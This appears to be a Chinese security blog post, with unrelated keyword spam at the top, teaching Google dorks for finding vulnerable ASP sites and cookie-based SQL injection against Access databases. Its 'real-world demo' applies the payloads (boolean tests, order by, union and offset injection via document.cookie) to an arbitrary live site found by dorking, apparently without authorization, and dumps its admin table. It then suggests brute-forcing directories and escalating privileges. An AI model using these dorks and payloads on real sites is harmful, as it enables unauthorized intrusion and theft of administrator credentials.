网站建站客户需求表单,长沙网站建设公司联系方式,浙江综合网站建设配件,李沧网站建设谁家好目录
谷歌语法-信息收集
cookie注入
实战演示
信息收集
SQL注入判断
查找字段数
爆破表名
输出结果
总结 本文由掌控安全学院 - 小博 投稿 谷歌语法-信息收集
1.查找带有ID传参的网站#xff08;可以查找sql注入漏洞#xff09; inurl:asp idxx 2.查找网站后台可以查找sql注入漏洞 inurl:asp idxx 2.查找网站后台多数有登陆框可以查找弱口令暴力破解等漏洞 site:http://xxxx.com “admin” site:http://xx.com intext:管理 site:http://xx.com inurl:login site:http://xx.com intitle:后台 3.查看上传漏洞 site:http://xx.com inurl:file site:http://xx.com inurl:load 4.查找敏感文件 filetype:mdb|doc|xlsx|pdf
cookie注入
1、cookie注入 cookie相当于访问者的身份证,后端php代码中的$_REQUEST[]来获取你的cookie,网站会获取Cookie传参然后和原有的SQL语句拼接再传入数据库,传入了数据库这样我们就有机可乘了我们可以修改cookie值进入数据库中进行sql注入 Cookie注入在ASP网站中和低版本php中才会有ASP常用的数据库是Accsess。
2、Access数据库 access有强大的数据处理、统计分析能力利用access的查询功能可以方便地进行各类汇总、平均等统计并且access数据库无库名。 access数据库在查询语句时和mysql不同access比较严谨 所以要select 字段 from 表名 函数exists(select*from 表名)可以验证这个表名是否存在这个表名还可以用burp来爆破
3、怎样修改cookie: 用burp抓包改 用插件改需要自己编码一下 阅览器自带js进行设置document.cookie’id’escape(“代码”)
实战演示
信息收集
通过谷歌语法查找带有asp文件下的id传参发现有很多带有id1传参的网站可以挨个试一试id传参数可以任意修改。 发现一家id104的网站
SQL注入判断
废话不多说直接判断是否存在sql注入,and 12发现网站报错但是11页面显示正常说明存在sql注入 document.cookieidescape(104 and 11) 2. document.cookieidescape(104 and 12) 查找字段数
直接查找一下字段数发现字段数为10
1 document.cookieidescape(104 order by 10) 爆破表名
因为这是一个ACCESS数据库没有库名所以我们可以使用burp爆破出表名,这里就不给大家展示了。
1. document.cookieidescape(104 union select 1,2,3,4,5,6,7,8,9,10 from admin) 发现存在admin表且回显点是2和5
输出结果
使用偏移注入查看admin表的字段数并且把表里的内容显示出来
1. document.cookieidescape(104 union select 1,2,3,4,5,6,7,admin.* from admin)2. document.cookieidescape(104 union select 1,2,3,admin.*,7,8,9,10 from admin)
总结
1.谷歌语法找到注入点 2.判断注入是否存在 3.通过cookie绕过注入 4.爆破表名 5.偏移注入查找表的字段数 6.最后可以通过爆破目录查找登陆框进入后台进一步渗透拿权限第一次投稿觉得这次实战记录很适合新手小白挖SRC希望多多支持 申明本文所分享内容仅用于网络安全技术讨论切勿用于违法途径所有渗透都需获取授权违者后果自行承担与本号及作者无关请谨记守法 没看够~欢迎关注
